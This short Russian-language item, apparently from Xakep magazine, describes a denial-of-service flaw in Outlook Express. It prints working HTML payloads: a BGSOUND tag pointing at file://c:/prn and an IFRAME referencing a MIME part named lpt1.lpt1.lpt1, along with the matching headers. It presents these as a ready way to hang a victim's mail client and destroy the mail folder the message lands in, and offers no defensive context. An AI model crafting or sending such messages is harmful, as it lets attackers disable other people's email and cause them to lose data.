Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Любимый всеми нами Outlook Express вешается при
получении сообщения, которое обращается к
DOS-устройствам при помощи тэгов BGSOUN или IFRAME.
Удалить сообщение невозможно,
соответственно предлагаемый вариант
напрочь убивает у бедного чела всю папку, в
которую это сообщение попадет.
Пример:
<BGSOUND balance=0 src="file://c:/prn" volume=0 loop=infinite>
или
<iframe src=cid:FThFC7b04R6 height=10 width=10></iframe>
где
Content-Type: text/plain;
name=lpt1.lpt1.lpt1
Content-Transfer-Encoding: 8bit
Content-ID: <FThFC7b04R6>